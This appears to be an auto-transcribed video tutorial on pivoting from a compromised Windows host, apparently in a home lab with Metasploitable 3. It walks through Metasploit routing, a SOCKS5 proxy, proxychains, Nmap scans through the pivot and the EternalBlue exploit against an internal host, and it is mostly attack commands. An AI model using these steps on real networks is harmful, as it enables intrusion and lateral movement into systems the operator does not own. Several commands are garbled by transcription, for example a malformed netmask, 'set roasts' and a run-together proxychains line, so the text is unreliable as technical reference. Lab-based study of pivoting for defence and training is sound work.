One host hacked? Good. But stopping there is for beginners. Real attackers move sideways, deeper, and break into systems you can't even see. Today, we pivot from a compromised Windows host into a hidden Windows server buried inside the network. Let's begin. We already compromised the Windows machine at 192.168.57.100. Now we'll use it as a bridge to reach Metasploitable 3 inside the same LAN. Show session, sessions. Switch back to Metasploit, sessions-I1, then show Windows internal IP, IP config. Expected output, Windows IP 192.168.57.100. Gateway, something like 192.168.57.1. Same LAN as Metasploitable 3. View devices, Windows can reach, ARP. This tells us Windows host can see Metasploitable 3 at 192.168.57.31. Perfect. We'll pivot into it. Now we tell Metasploit any traffic for 192.168.57.0/24 should pass through session 1. Route add 192.168.57.0, 255.255.255.01. Check route print. Now our Kali traffic can travel through the Windows 192.168.57.100 machine. Start socks. Proxy use auxiliary/server/socks_proxy. Set SRV PORT 1080. Set version 5 run. Should show starting the socks proxy server. This proxy lets us use Nmap, Nikto, GoBuster, and any tool to scan through the pivot. Configure Proxychains, Linux attacker, sudo nano, etc. Proxychains.conf, add at bottom, socks 5127.0.0.11080 save. Now all our tools will pivot through the Windows host. Scan Metasploitable 3 through pivot. Now scanning works even though Kali cannot directly access 192.168.57.31. Proxychains Nmap ST P21 22 80 445 192.168.57.31 or full. Proxychains Nmap ST 192.168.57.0/24. Expected results: port 22 open, SSH, port 135 open, MSRPC, port 139 open, NetBIOS SSN, port 445 open, Samba, port 3306 open, MySQL. As you can see, we can now scan Metasploitable 3 through the Windows pivot. Attack internal machine from pivot. Let's say we found a Windows 7 or 10 with SMB open. We use Eternal Blue as example. Use exploit/windows/smb/ms 17_010_Eternal Blue. Set roasts 192.168.57.31 exploit. If successful, Metasploit session 2 opened. You now control a second device inside the private network without touching it physically. This is pivoting power. One machine hacked is nothing. A full internal network breached from a single entry point. That's real red team power. Next video, lateral movement and privilege escalation. Subscribe and continue the journey.